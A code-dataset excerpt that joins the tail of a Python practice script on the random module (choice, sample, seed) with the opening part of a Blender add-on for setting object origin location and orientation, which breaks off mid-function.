Continue...\")\nprint_header(\"choice() - Example 4\")\n\naew_teams = [\n ['Jon Moxley', 'Wheeler Yuta', 'Claudio Castagnoi'],\n ['Nick Jackson', 'Matt Jackson', 'Kenny Omega'],\n ['Pac', 'Penta El Zero Midedo', 'Rey Fenix']\n]\n\nrand_team1 = random.choice(aew_teams)\nrand_team2 = random.choice(aew_teams)\n\nwhile rand_team1 == rand_team2:\n rand_team2 = random.choice(aew_teams)\n \nprint(' The randomly selected AEW trios Tag team math is between ' + rand_team1[0] + ', ' + rand_team1[1] + ', ' + rand_team1[2] + ', and ' + rand_team2[0] + ', ' + rand_team2[1] + ', ' + rand_team2[2])\n\ninput(\"\\n Press Enter to Continue...\")\nprint_header(\"sample() - Example 1\")\n\nweapons = ['Poltergust G-OO', 'Strobulb', 'Dark-Light device', 'Suction Shot']\nrandom_weapon = random.sample(weapons, k=1)\n\nprint(f' The randomly selected weapon is: {random_weapon}')\n\ninput(\"\\n Press Enter to Continue...\")\nprint_header(\"sample() - Example 2\")\n\ngems = ['Diamond', 'Ruby', 'Emerald', 'Sapphire']\nrandom_gems = random.sample(gems, 2)\n\nprint(\" \", random_gems)\n\ninput(\"\\n Press Enter to Continue...\")\nprint_header(\"sample() - Example 3\")\n\nfloors = [\"B1\", \"2F\", \"5F\", \"8F\", \"10F\"]\nrandom_floors = random.sample(floors, k=len(floors))\n\nprint(\" \", random_floors)\n\ninput(\"\\n Press Enter to Continue...\")\nprint_header(\"sample() - Example 4\")\n\nghosts = ['Polterkitty', 'Goob', 'Hammers', 'Slinker', 'Kruller', 'Boos']\nrandom_ghost = random.sample(ghosts, 1)\n\nprint(\" \", random_ghost)\n\ninput(\"\\n Press Enter to Continue...\")\nprint_header(\"Seed Introduction\")\n\nrandom.seed(42)\nprint(' ', random.random())\n\nprint() # Spacer\n\nrandom.seed(42)\nprint(' ', random.randint(1, 10))\n\nprint() # Spacer\n\nrandom.seed(1234)\nprint(' ', random.random())\n\nrandom.seed(5678)\nprint(' ', random.random())\n\ninput(\"\\n Press Enter to Continue...\")","repo_name":"CyberSurge-Dev/Python2","sub_path":"Module 3/guidedPractice15.py","file_name":"guidedPractice15.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"4041776563","text":"bl_info = {\n\t\"name\": \"SOT\",\n\t\"author\": \"IIIFGIII (Discord IIIFGIII#7758)\",\n\t\"version\": (1, 2),\n\t\"blender\": (2, 83, 0),\n\t\"location\": \"Viev3D > N panel > FGT > SOT\",\n\t\"description\": \"Set Origin Transform (SOT) tool. Tested on versions 2.83.18 and 2.93.4. For bug report/feedback contact me in Discord.\",\n\t\"warning\": \"\",\n\t\"wiki_url\": \"https://github.com/IIIFGIII/FG_Tools\",\n\t\"category\": \"FG_Tools\",\n}\n\nimport bpy, bmesh, math, bgl, gpu, time\nimport numpy as np\nimport mathutils as mu\nfrom gpu_extras.batch import batch_for_shader\n\nbpr = bpy.props\n\n\npr_values = {}\nsob_mts = {}\nspot_orient_matrix = mu.Matrix.Identity(3)\nnvdata = np.empty(0, dtype=np.float32)\nmnvdata = []\nsvdata = np.empty(0, dtype=np.float32)\nmsvdata = []\nsps_data = []\nrot_update = 0 \nloc_mode_current = '1'\n\nspot_mode_space_check = None\nspot_projection_check = None\nspot_sob_matrices_vdata = []\nspot_orient_matrix = None\nspot_sps_data = []\nspot_psp_data = []\n\nshapes = [\n\t[(-0.2,0,0),(-0.05,0,0), (0.05,0,0),(0.2,0,0), (0,0,0),(-0.1,0.1,0), (-0.1,0.1,0),(0.1,0.1,0), (0.1,0.1,0),(0,0,0)],\n\t[(-0.1,-0.1,0),(-0.1,0.1,0), (-0.1,0.1,0),(0.1,0.1,0), (0.1,0.1,0),(0.1,-0.1,0), (0.1,-0.1,0),(-0.1,-0.1,0)],\n\t[(-0.1,0,0),(0,0.1,0), (0,0.1,0),(0.1,0,0), (0.1,0,0),(0,-0.1,0), (0,-0.1,0),(-0.1,0,0)],\n\t[(-0.1,-0.1,0),(0,0,0), (0,0,0),(0.1,-0.1,0), (0.1,-0.1,0),(-0.1,-0.1,0)],\n\t[(0.2,0.2,0),(0.05,0.05,0), (-0.2,0.2,0),(-0.05,0.05,0), (-0.2,-0.2,0),(-0.05,-0.05,0), (0.2,-0.2,0),(0.05,-0.05,0),]]\n\n#Colors = white spots, border mesh spot, bound center spot, center of mass spot, \n#\t\t X, Y, Z axis \n#\t\t bound front/back\n# \t\t drop point , drop lines A,B,C\ncolors = [(1.0, 1.0, 1.0, 1.0),(0, 0.9, 1.0, 1.0),(0.9, 0.2, 0.2, 1.0),(1.0, 0.5, 0.05, 1.0),\n\t\t (1.0, 0.2, 0.2, 1.0),(0.4, 1, 0.0, 1.0),(0.0 , 0.5, 1.0, 1.0),\n\t\t (1.0, 0.85, 0.15, 1.0),(0.6, 0.5, 0.2, 1.0),\n\t\t (1.0, 0.1, 0.8, 1.0), (1.0, 0.65, 0.95, 1.0), (0.6, 0.6, 0.6, 1.0)]\n\ngrid = [(-2,2.25,0),(-2,-2.25,0), (-1,2.25,0),(-1,-2.25,0), (0,2.25,0),(0,-2.25,0), (1,2.25,0),(1,-2.25,0), (2,2.25,0),(2,-2.25,0),\n\t\t(2.25,-2,0),(-2.25,-2,0), (2.25,-1,0),(-2.25,-1,0), (2.25,0,0),(-2.25,0,0), (2.25,1,0),(-2.25,1,0), (2.25,2,0),(-2.25,2,0)]\n\naxis_base =[((-1.5,0,0),(colors[4])),((1.5,0,0),(colors[4])),\n\t\t\t((1.4,0.1,0.1),(colors[4])),((1.5,0,0),(colors[4])),\n\t\t\t((1.4,0.1,-0.1),(colors[4])),((1.5,0,0),(colors[4])),\n\t\t\t((1.4,-0.1,-0.1),(colors[4])),((1.5,0,0),(colors[4])),\n\t\t\t((1.4,-0.1,0.1),(colors[4])),((1.5,0,0),(colors[4])),\n\n\t\t\t((0,-1.5,0),(colors[5])),((0,1.5,0),(colors[5])),\n\t\t\t((0.1,1.4,0.1),(colors[5])),((0,1.5,0),(colors[5])),\n\t\t\t((-0.1,1.4,0.1),(colors[5])),((0,1.5,0),(colors[5])),\n\t\t\t((-0.1,1.4,-0.1),(colors[5])),((0,1.5,0),(colors[5])),\n\t\t\t((0.1,1.4,-0.1),(colors[5])),((0,1.5,0),(colors[5])),\n\n\t\t\t((0,0,-1.5),(colors[6])),((0,0,1.5),(colors[6])),\n\t\t\t((0.1,0.1,1.4),(colors[6])),((0,0,1.5),(colors[6])),\n\t\t\t((-0.1,0.1,1.4),(colors[6])),((0,0,1.5),(colors[6])),\n\t\t\t((-0.1,-0.1,1.4),(colors[6])),((0,0,1.5),(colors[6])),\n\t\t\t((0.1,-0.1,1.4),(colors[6])),((0,0,1.5),(colors[6]))]\n\n\ndef report(self,message):\n\tself.report({'ERROR'}, message)\n\treturn{'CANCELLED'}\n\ndef unic_name_geterator(name, existing_names, use_exception = False, excepted_name = ''):\n\tname_is_unic = False\n\tfirst_check = True\n\n\twhile not name_is_unic:\n\t\tname_is_unic = True\n\t\tfor en in existing_names:\n\t\t\tif use_exception and name == excepted_name:\n\t\t\t\tname_is_unic = True\n\t\t\t\tbreak\t\t\t\t\n\t\t\telif first_check and name == en and name[-4] == '.' and name[-3:].isnumeric():\n\t\t\t\tname = name[:-3] + '001'\n\t\t\t\tname_is_unic = False\n\t\t\t\tfirst_check = False\n\t\t\t\tbreak\n\t\t\telif first_check and name == en: \n\t\t\t\tname = name + '.001'\n\t\t\t\tname_is_unic = False\n\t\t\t\tfirst_check = False\n\t\t\t\tbreak\n\t\t\telif name == en:\n\t\t\t\tnum = str(int(name[-3:])+1)\n\t\t\t\tzeros = '00' if len(num) == 1 else '0'\n\t\t\t\tnum = zeros + num if len(num) != 3 else num \n\t\t\t\tname = name[:-3] + num\n\t\t\t\tname_is_unic = False\n\t\t\t\tbreak\n\n\treturn name\t\n\ndef combine_matrix_v3(v1,v2,v3):\n\tmt = mu.Matrix.Identity(3)\n\tmt.col[0] = v1\n\tmt.col[1] = v2\n\tmt.col[2] = v3\n\treturn mt\n\ndef Vector(vec):\n\treturn mu.Vector(vec)\n\ndef tov4(xyz,w):\n\treturn mu.Vector((xyz[0],xyz[1],xyz[2],w))\n\ndef vector_fix(obm,vector):\n\treturn (obm.inverted_safe().transposed().to_3x3() @ vector).normalized()\n\ndef distance(va,vb):\n\treturn math.sqrt((vb[0]-va[0])**2+(vb[1]-va[1])**2+(vb[2]-va[2])**2)\n\ndef remap(va,vb,ra,rb,rv):\n\tif va == vb or ra == rb: return va\n\telse:\n\t\tif rarb and rv>=ra: return va\n\t\telif ra=rb or ra>rb and rv<=rb: return vb\n\t\telse: return (va+(((rv-ra)/(rb-ra))*(vb-va)))\n\ndef vectors_remap(vx,vy,vz,sot):\n\n\tif not sot.z_rem:\n\t\treturn vx,vy,vz\n\n\txr,yr,zr = vx,vy,vz\n\tzax = sot.z_axis\n\n\tif zax == 'z+':\n\t\trem = sot.rem_zp \n\t\tvz = zr\n\t\tif rem == '1': vx,vy = xr,yr\n\t\telif rem == '2': vx,vy = yr,xr*-1\n\t\telif rem == '3': vx,vy = xr*-1,yr*-1\n\t\telif rem == '4': vx,vy = yr*-1,xr\n\n\telif zax == 'z-':\n\t\trem = sot.rem_zn \n\t\tvz = zr*-1\n\t\tif rem == '1': vx,vy = xr,yr*-1\n\t\telif rem == '2': vx,vy = yr,xr\n\t\telif rem == '3': vx,vy = xr*-1,yr\n\t\telif rem == '4': vx,vy = yr*-1,xr*-1\n\n\telif zax == 'y+':\n\t\trem = sot.rem_yp\n\t\tvz = yr\n\t\tif rem == '1': vx,vy = xr,zr*-1\n\t\telif rem == '2': vx,vy = zr,xr\n\t\telif rem == '3': vx,vy = xr*-1,zr\n\t\telif rem == '4': vx,vy = zr*-1,xr*-1\n\n\telif zax == 'y-':\n\t\trem = sot.rem_yn\n\t\tvz = yr*-1\n\t\tif rem == '1': vx,vy = xr,zr\n\t\telif rem == '2': vx,vy = zr,xr*-1\n\t\telif rem == '3': vx,vy = xr*-1,zr*-1\n\t\telif rem == '4': vx,vy = zr*-1,xr\n\n\telif zax == 'x+':\n\t\trem = sot.rem_xp\n\t\tvz = xr\n\t\tif rem == '1': vx,vy = zr*-1,yr\n\t\telif rem == '2': vx,vy = yr,zr\n\t\telif rem == '3': vx,vy = zr,yr*-1\n\t\telif rem == '4': vx,vy = yr*-1,zr*-1\n\n\telif zax == 'x-':\n\t\trem = sot.rem_xn\n\t\tvz = xr*-1\n\t\tif rem == '1': \tvx = zr\n\t\telif rem == '2': vx,vy = yr,zr*-1\n\t\telif rem == '3': vx,vy = zr*-1,yr*-1\n\t\telif rem == '4': vx,vy = yr*-1,zr\n\n\treturn vx,vy,vz\n\ndef object_in_edit(bob,sob_r):\n\teob = []\n\tfor ob in sob_r:\n\t\tif ob.mode == 'EDIT': eob.append(ob)\n\t\telif ob.mode == 'OBJECT': ob.select_set(False)\n\tif eob != []: bpy.ops.object.editmode_toggle()\n\tbob.select_all(action='DESELECT')\n\treturn eob\n\ndef recover_edit(eob,bcv,aob_r,sob_r):\n\tbcv.objects.active = aob_r\n\tif eob != []:\n\t\tfor ob in eob: ob.select_set(True)\n\t\tbpy.ops.object.editmode_toggle()\n\tfor ob in sob_r: ob.select_set(True)\n\treturn\n\n# def fix_children_loc(x,y,z,tob,bcv,oob):\n# \tchildrens = [ob for ob in bpy.data.objects if ob.parent == tob]\n# \tfix_vector = mu.Vector(tob.matrix_world.col[3][:3]) - mu.Vector((x,y,z))\n# \tfor tob in childrens:\n# \t\t#if not tob in oob: \n# \t\ttob.select_set(True)\n# \t\tbpy.ops.transform.translate(value= fix_vector)\n# \t\ttob.select_set(False)\n# \t\t# else:\n# \t\t# \tprint(tob.name + 'was ignored in children fix')\n\ndef fix_children_clear(tob):\n\tchildrens = [ob for ob in bpy.data.objects if ob.parent == tob]\n\tfor tob in childrens:\n\t\ttob.select_set(True)\n\t\tbpy.ops.object.parent_clear(type='CLEAR_KEEP_TRANSFORM')\n\t\ttob.select_set(False)\n\treturn childrens\n\ndef fix_children_clear(tob):\n\tchildrens = [ob for ob in bpy.data.objects if ob.parent == tob]\n\tfor tob in childrens:\n\t\ttob.select_set(True)\n\t\tbpy.ops.object.parent_clear(type='CLEAR_KEEP_TRANSFORM')\n\t\ttob.select_set(False)\n\treturn childrens\n\ndef set_origin_location(x,y,z,tob,bcv,oob=[]):\n\n\tchildrens = [ob for ob in bpy.data.objects if ob.parent == tob]\n\tfor cob in childrens:\n\t\tcob.select_set(True)\n\t\tbpy.ops.object.parent_clear(type='CLEAR_KEEP_TRANSFORM')\n\t\tcob.select_set(False)\n\n\ttob.select_set(True)\n\tbcv.objects.active = tob\n\tloc = tob.matrix_world.col[3]\n\tpos = mu.Vector((x,y,z,1))\n\tdif = mu.Vector((loc - pos)[:3])\n\ttob.matrix_world.col[3] = pos\n\tobm = tob.matrix_world\n\ttmt = mu.Matrix.Identity(4)\n\ttmt.col[3] = tov4(obm.to_3x3().inverted() @ dif,1)\t\t\n\ttob.data.transform(tmt)\n\tif tob.type == 'ARMATURE':\n\t\tbpy.ops.object.editmode_toggle()\n\t\tbpy.ops.object.editmode_toggle()\n\n\tfor cob in childrens:\n\t\tcob.select_set(True)\n\t\tbpy.ops.object.parent_set(type='OBJECT', keep_transform=True)\n\t\tcob.select_set(False)\n\n\ttob.select_set(False)\n\treturn\n\ndef set_origin_orientation(x,y,z,tob,bcv,bob):\n\n\tchildrens = [ob for ob in bpy.data.objects if ob.parent == tob]\n\tfor cob in childrens:\n\t\tcob.select_set(True)\n\t\tbpy.ops.object.parent_clear(type='CLEAR_KEEP_TRANSFORM')\n\t\tcob.select_set(False)\n\n\ttob.select_set(True)\n\tbcv.objects.active = tob\n\trmt = (mu.Euler((x,y,z),'XYZ')).to_matrix()\n\tloc = tob.matrix_world.col[3]\n\tscl = tob.matrix_world.to_scale()\n\trmt_m = rmt.to_4x4()\n\trmt_m.col[0] = rmt_m.col[0]*scl[0]\n\trmt_m.col[1] = rmt_m.col[1]*scl[1]\n\trmt_m.col[2] = rmt_m.col[2]*scl[2] \t\n\trmt_m.col[3] = loc\n\trmt = (tob.matrix_world.to_3x3().inverted() @ rmt).to_4x4()\n\trmt.col[0] = rmt.col[0]*scl[0]\n\trmt.col[1] = rmt.col[1]*scl[1]\n\trmt.col[2] = rmt.col[2]*scl[2]\n\ttob.data.transform(rmt.inverted())\n\ttob.matrix_world = rmt_m\n\tbob.transform_apply(location = False, rotation= False, scale= True, properties=False)\n\tif tob.type == 'ARMATURE':\n\t\tbpy.ops.object.editmode_toggle()\n\t\tbpy.ops.object.editmode_toggle()\n\n\tfor cob in childrens:\n\t\tcob.select_set(True)\n\t\tbpy.ops.object.parent_set(type='OBJECT', keep_transform=True)\n\t\tcob.select_set(False)\n\n\ttob.select_set(False)\n\treturn\n\ndef get_preset_loc_rot(sot,loc):\n\tif pr_values != {}:\n\t\tif loc: return pr_values.get(sot.loc_rot_presets)[0]\n\t\telse: return pr_values.get(sot.loc_rot_presets)[1]\n\ndef get_cursor_loc_rot(bco,sot,loc):\n\tmt = bco.scene.cursor.matrix\n\tif loc:\n\t\treturn mu.Vector(mt.col[3][:3])\n\telse:\n\t\tmt = mt.to_3x3()\n\t\tvx,vy,vz = mu.Vector(mt.col[0]),mu.Vector(mt.col[1]),mu.Vector(mt.col[2])\n\t\tvx,vy,vz = vectors_remap(vx,vy,vz,sot)\n\t\treturn combine_matrix_v3(vx,vy,vz)\n\ndef get_element_loc(self,bco,sot,aob):\n\tbmd = bmesh.from_edit_mesh(bco.edit_object.data)\n\tbma = bmd.select_history.active\n\n\tif bma == None: return report(self,'No active element in selection!!!')\n\telse:\n\t\tobm = aob.matrix_world\n\t\tif str(bma).find('BMVert') == 1:\n\t\t\tco = bma.co\n\t\telse:\n\t\t\tco = mu.Vector((0,0,0))\n\t\t\tverts = bma.verts\n\t\t\tfor v in verts:\n\t\t\t\tco += v.co\n\t\t\tco = co/len(verts)\n\t\tif obm.to_scale() != (1.0,1.0,1.0):\n\t\t\tco = obm @ co\n\t\treturn co\n\ndef get_element_vectors(self,bco,sot,aob):\n\tbmd = bmesh.from_edit_mesh(bco.edit_object.data)\n\tbma = bmd.select_history.active\n\tvzw = mu.Vector((0,0,1))\n\tobm = aob.matrix_world\n\n\tif bma == None: return report(self,'No active element in selection!!!')\n\telse:\n\t\tif str(bma).find('BMVert') == 1:\n\n\t\t\t# Vertex Normals\n\t\t\tif len(bma.link_faces) == 0:\n\t\t\t\tvz = vector_fix(obm, (bma.co - mu.Vector(obm.col[3][:3])))\n\t\t\t\tif vz[2]>0:\n\t\t\t\t\tm = -1\n\t\t\t\telse:\n\t\t\t\t\tvzw = vzw*-1\n\t\t\t\t\tm = 1\n\t\t\t\t\n\t\t\t\tif vzw.dot(vz) > 0.5:\n\t\t\t\t\tvy = (vzw - (vzw.dot(vz)*vz)).normalized() * m\n\t\t\t\telse:\n\t\t\t\t\tm = m*-1\n\t\t\t\t\tvm = (vz * mu.Vector((1,1,0))).normalized()\n\t\t\t\t\tvy = (vm - (vm.dot(vz)*vz)).normalized() * m\n\t\t\t\t\n\t\t\t\tif (abs(sum(vy[:]))) == 0:\n\t\t\t\t\tif abs(vz[2]) == 1:\n\t\t\t\t\t\tvy = mu.Vector((0,1,0))\n\t\t\t\t\telif vz[2] == 0:\n\t\t\t\t\t\tvy = mu.Vector((0,0,-1))\n\n\t\t\t\tvx = (vz.cross(vy))*-1\n\n\t\t\telse:\n\t\t\t\tvz = vector_fix(obm, bma.normal)\n\t\t\t\tif vz[2]>0:\n\t\t\t\t\tm = -1\n\t\t\t\telse:\n\t\t\t\t\tvzw = vzw*-1\n\t\t\t\t\tm = 1\n\t\t\t\t\n\t\t\t\tif vzw.dot(vz) > 0.5:\n\t\t\t\t\tvy = (vzw - (vzw.dot(vz)*vz)).normalized() * m\n\t\t\t\telse:\n\t\t\t\t\tm = m*-1\n\t\t\t\t\tvm = (vz * mu.Vector((1,1,0))).normalized()\n\t\t\t\t\tvy = (vm - (vm.dot(vz)*vz)).normalized() * m\n\n\t\t\t\tif (abs(sum(vy[:]))) == 0:\n\t\t\t\t\tif abs(vz[2]) == 1:\n\t\t\t\t\t\tvy = mu.Vector((0,1,0))\n\t\t\t\t\telif vz[2] == 0:\n\t\t\t\t\t\tvy = mu.Vector((0,0,-1))\n\n\t\t\t\tvx = (vz.cross(vy))*-1\n\n\t\t# Edges Normals\n\t\telif str(bma).find('BMEdge') == 1: \n\t\t\tvy = vector_fix(obm, (bma.verts[0].co - bma.verts[1].co).normalized())\n\t\t\tif len(bma.link_faces) == 0:\n\t\t\t\tif vy[2]>0:\n\t\t\t\t\tm = -1\n\t\t\t\telse:\n\t\t\t\t\tvzw = vzw*-1\n\t\t\t\t\tm = 1\n\n\t\t\t\tif vzw.dot(vy) > 0.5:\n\t\t\t\t\tvz = (vzw - (vzw.dot(vy)*vy)).normalized() * m\n\t\t\t\telse:\n\t\t\t\t\tm = m*-1\n\t\t\t\t\tvm = (vy * mu.Vector((1,1,0))).normalized()\n\t\t\t\t\tvz = (vm - (vm.dot(vy)*vy)).normalized() * m\n\t\t\telif len(bma.link_faces) == 1:\n\t\t\t\tvz = vector_fix(obm, bma.link_faces[0].normal)\n\t\t\telse:\n\t\t\t\tvz = ((vector_fix(obm, bma.link_faces[0].normal) + vector_fix(obm, bma.link_faces[1].normal))/2).normalized()\n\n\t\t\tvx = (vz.cross(vy))*-1\n\n\t\t# Faces Normals\n\t\telse: \n\t\t\tvz = vector_fix(obm, bma.normal)\n\t\t\tprint(vz)\n\t\t\tif len(bma.verts)\t== 3:\n\t\t\t\tprint('FACE Triangle')\n\t\t\t\teils = (sorted([(i,e.calc_length()) for i,e in enumerate(bma.edges)], key=lambda e: e[1]))\n\t\t\t\tei = eils[0][0] if eils[1][1] / eils[0][1] > 1.262169 else eils[2][0]\n\t\t\t\tvy = vector_fix(obm, (bma.edges[ei].verts[0].co - bma.edges[ei].verts[1].co).normalized())\n\t\t\t\tvy = vy-(vy.dot(vz)*vz)\n\n\t\t\t\t#vy = vector_fix(obm, (bma.calc_tangent_edge())*-1)\n\t\t\telif len(bma.verts) == 4:\n\t\t\t\tprint('FACE Quad')\n\t\t\t\tvy = vector_fix(obm, ((bma.calc_tangent_edge_pair()).normalized())*-1)\n\t\t\t\tvy = vy-(vy.dot(vz)*vz)\n\t\t\telse:\n\t\t\t\tprint('FACE Ngon')\n\t\t\t\tle,ei = 0,-1\n\t\t\t\t#c = 0 remove\n\t\t\t\tfor i,e in enumerate(bma.edges):\n\t\t\t\t\tif e.calc_length() > le: le,ei = e.calc_length(),i\n\t\t\t\tvy = vector_fix(obm, (bma.edges[ei].verts[0].co - bma.edges[ei].verts[1].co).normalized())\n\t\t\t\tvy = vy-(vy.dot(vz)*vz)\n\t\t\tvx = (vz.cross(vy))*-1\n\n\t\t#vx,vy,vz = vectors_remap(vx,vy,vz,sot)\n\n\t\treturn combine_matrix_v3(vx,vy,vz)\n\ndef get_object_loc_rot(self,bco,sot,loc):\n\n\tbcv = bco.view_layer\n\taob = bcv.objects.active\n\n\tif aob == None: return report(self,'No active object in selection!!!')\n\telse:\n\t\tif loc:\n\t\t\treturn mu.Vector(aob.matrix_world.col[3][:3])\n\t\telse:\n\t\t\tmt = aob.matrix_world.to_3x3().normalized()\n\t\t\tvx,vy,vz = mu.Vector(mt.col[0]),mu.Vector(mt.col[1]),mu.Vector(mt.col[2])\n\t\t\tvx,vy,vz = vectors_remap(vx,vy,vz,sot)\n\t\t\treturn combine_matrix_v3(vx,vy,vz)\n\ndef set_manual_values(sot,value,param):\n\tif param == 'loc':\n\t\tsot.loc_x,sot.loc_y,sot.loc_z = value\n\telif param == 'rot':\n\t\tif abs(value[0]) < 0.0001: value[0] = 0\n\t\tif abs(value[1]) < 0.0001: value[1] = 0\n\t\tif abs(value[2]) < 0.0001: value[2] = 0\n\t\tsot.rot_x,sot.rot_y,sot.rot_z = value\n\telif param == 'czp':\n\t\tsot.czp_x,sot.czp_y,sot.czp_z = value\n\treturn\n\ndef aob_check(aob):\n\tif aob == None: return (True,'No ACTIVE object in selection!!!!')\n\telse: return (False,'')\n\ndef mesh_check(cob):\n\tif cob.type != 'MESH': return (True,'One of selected objects is not MESH type.')\n\telse: return (False,'')\n\ndef screen_size(bco,loc,pdc):\n\ts3d = bco.space_data.region_3d\n\ta3d = bco.area.spaces.active.region_3d\n\n\tif s3d.view_perspective == 'ORTHO':\n\t\tscl = a3d.view_distance/10\n\telif s3d.view_perspective == 'PERSP':\n\t\tvmt = a3d.view_matrix\n\t\tdis = distance(vmt @ loc,mu.Vector((0,0,0)))\n\t\tif dis<30 and pdc:\n\t\t\tscl = abs(dis)/remap(1,10,0,30,dis)\n\t\telse:\n\t\t\tscl = abs(dis)/10\n\n\telse:\n\t\tzo = a3d.view_camera_zoom\n\t\tvmt = a3d.view_matrix\n\t\tif zo>0:\n\t\t\tv = 3.14**(((30+((zo)+30))/30)*remap(1,0.26,0,1,math.sqrt((zo/600)**0.7)))\n\t\telse:\n\t\t\tv = 3.14**((30+((zo)+30))/30)\n\n\t\tdis = distance(vmt @ loc,mu.Vector((0,0,0)))\n\t\tif dis<30 and pdc:\n\t\t\tscl = abs(dis)/remap(1,v,0,30,dis)\n\t\telse:\n\t\t\tscl = abs(dis)/v\n\n\treturn scl\n\ndef draw_loc_rot_axis_main(self,context):\n\tbco = bpy.context\n\tsot = context.scene.sot_props\n\n\tvc = [(-0.3, 0.0, 0.0), (-0.1, 0.0, 0.0),\n\t\t(0.0, -0.3, 0.0), (0.0, -0.1, 0.0),\n\t\t(0.0, 0.0, -0.3), (0.0, 0.0, -0.1),\n\t\t(0.1, 0.0, 0.0), (1.0, 0.0, 0.0),\n\t\t(0.0, 0.1, 0.0), (0.0, 1.0, 0.0),\n\t\t(0.0, 0.0, 0.1), (0.0, 0.0, 1.0)]\n\tvcm = []\n\n\tloc = mu.Vector((sot.loc_x,sot.loc_y,sot.loc_z))\n\teuler = mu.Euler((sot.rot_x,sot.rot_y,sot.rot_z),'XYZ')\n\trot = euler.to_matrix()\n\n\tscl = screen_size(bco,loc,False)\n\n\tfor v in vc:\n\t\tv = (rot @ (mu.Vector(v) * scl)) + loc\n\t\tvcm.append(v)\n\n\tshader = gpu.shader.from_builtin('3D_SMOOTH_COLOR')\n\tcol = [(1.0, 1.0, 1.0, 0.8), (1.0, 1.0, 1.0, 0.8),\n\t\t(1.0, 1.0, 1.0, 0.8), (1.0, 1.0, 1.0, 0.8),\n\t\t(1.0, 1.0, 1.0, 0.8), (1.0, 1.0, 1.0, 0.8),\n\t\t(1.0, 0.0, 0.0, 1.0), (1.0, 0.0, 0.0, 1.0),\n\t\t(0.0, 1.0, 0.0, 1.0), (0.0, 1.0, 0.0, 1.0),\n\t\t(0.0, 0.0, 1.0, 1.0), (0.0, 0.0, 1.0, 1.0)]\n\n\tdraw_this(shader,vcm,col,6)\n\treturn\n\ndef draw_loc_rot_presets_main(self,context):\n\tbco = bpy.context\n\tsot = context.scene.sot_props\n\n\tglobal pr_values\n\tglobal colors\n\tglobal grid\n\tglobal axis_base\n\n\tif pr_values != {}:\n\t\tprv = pr_values.get(sot.loc_rot_presets)\n\t\tloc = mu.Vector(prv[0])\n\t\teuler = mu.Euler(prv[1],'XYZ')\n\t\trot = euler.to_matrix()\n\telse:\n\t\tloc = mu.Vector((0,0,0))\n\t\trot = mu.Matrix.Identity(3)\n\n\tscl_steps = [(700,500),(60,50),(5,5),(1,1),(0.5,0.5),(0.07,0.125)]\n\tscl = screen_size(bco,loc,False)\n\tscli = 1\n\tif scl>=1:\n\t\tfor st in scl_steps:\n\t\t\tif scl>=st[0]:\n\t\t\t\tscli = st[1] \n\t\t\t\tbreak\t\n\telse:\n\t\tfor st in scl_steps[::-1]:\n\t\t\tif scl<=st[0]:\n\t\t\t\tscli = st[1] \n\t\t\t\tbreak\t\n\n\n\tgrid_crd = []\n\tgrid_col = []\n\n\tfor crd in grid:\n\t\tif scli != 1:\n\t\t\tcrd = (rot @ (mu.Vector(crd) * scli)) + loc\n\t\telse:\n\t\t\tcrd = (rot @ mu.Vector(crd)) + loc\n\t\tgrid_crd.append(crd)\n\t\tgrid_col.append((1,1,1,1))\n\t\t\n\n\n\taxis_crd = []\n\taxis_col = []\n\n\tfor cc in axis_base:\n\t\tcrd = (rot @( mu.Vector(cc[0]) * scl)) + loc\n\t\taxis_crd.append(crd)\n\t\taxis_col.append(cc[1])\t\t\n\n\tshader = gpu.shader.from_builtin('3D_SMOOTH_COLOR')\n\tdraw_this(shader,grid_crd,grid_col)\n\tdraw_this(shader,axis_crd,axis_col,2)\n\treturn\n\ndef matrices_vdata_get(spot_set_mode,aob,sob):\n\n\tglobal spot_sob_matrices_vdata\n\tspot_sob_matrices_vdata.clear()\n\n\tif spot_set_mode == '1' or spot_set_mode == '3':\n\t\tif aob != None:\n\t\t\tif aob.type == 'MESH':\n\t\t\t\tif aob.mode == 'EDIT': aob.update_from_editmode()\n\t\t\t\tv_num = len(aob.data.vertices)\n\t\t\t\tvdata = np.empty(v_num*3, dtype=np.float32)\n\t\t\t\taob.data.vertices.foreach_get('co',vdata)\n\t\t\t\tvdata = np.reshape(vdata,(v_num,3))\n\t\t\t\tobm = aob.matrix_world\n\t\t\t\tfor v in range(vdata.shape[0]): vdata[v] = (obm @ mu.Vector(vdata[v]))[:]\n\t\t\t\tspot_sob_matrices_vdata.append((obm,vdata))\n\n\telif spot_set_mode == '2':\n\t\tmvdata = np.empty(0, dtype=np.float32)\n\t\tfor ob in sob:\n\t\t\tif ob.type == 'MESH':\n\t\t\t\tif ob.mode == 'EDIT': ob.update_from_editmode()\n\t\t\t\tv_num = len(ob.data.vertices)\n\t\t\t\tvdata = np.empty(v_num*3, dtype=np.float32)\n\t\t\t\tob.data.vertices.foreach_get('co',vdata)\n\t\t\t\tvdata = np.reshape(vdata,(v_num,3))\n\t\t\t\tobm = ob.matrix_world\n\t\t\t\tfor v in range(vdata.shape[0]): vdata[v] = (obm @ mu.Vector(vdata[v]))[:]\n\t\t\t\tmvdata = np.append(mvdata,vdata)\n\t\tmvdata = np.reshape(mvdata, (mvdata.size//3, 3))\n\t\tif mvdata != []:\n\t\t\tif aob != None and aob.type == 'MESH': obm = aob.matrix_world\n\t\t\telif aob != None: obm = aob.matrix_world\n\t\t\telse:\n\t\t\t\tfor ob in sob:\n\t\t\t\t\tif ob.type == 'MESH':\n\t\t\t\t\t\tobm = ob.matrix_world\n\t\t\t\t\t\tbreak\n\t\t\tobm = aob.matrix_world if aob != None else sob[0].matrix_world\n\t\t\tspot_sob_matrices_vdata.append((obm,mvdata))\n\n\telse:\n\t\tfor ob in sob:\n\t\t\tif ob.type == 'MESH':\n\t\t\t\tif ob.mode == 'EDIT': ob.update_from_editmode()\n\t\t\t\tv_num = len(ob.data.vertices)\n\t\t\t\tvdata = np.empty(v_num*3, dtype=np.float32)\n\t\t\t\tob.data.vertices.foreach_get('co',vdata)\n\t\t\t\tvdata = np.reshape(vdata,(v_num,3))\n\t\t\t\tobm = ob.matrix_world\n\t\t\t\tfor v in range(vdata.shape[0]): vdata[v] = (obm @ mu.Vector(vdata[v]))[:]\n\t\t\t\tspot_sob_matrices_vdata.append((obm,vdata))\n\ndef rotation_matrix_get(spot_set_space,bco,sot,aob,sob):\n\n\tglobal pr_values\n\tglobal spot_orient_matrix\n\n\tif spot_set_space == '5' and pr_values == {}:\n\t\tspot_set_space = '1' \n\n\tif spot_set_space == '1': # Global\n\t\tspot_orient_matrix = 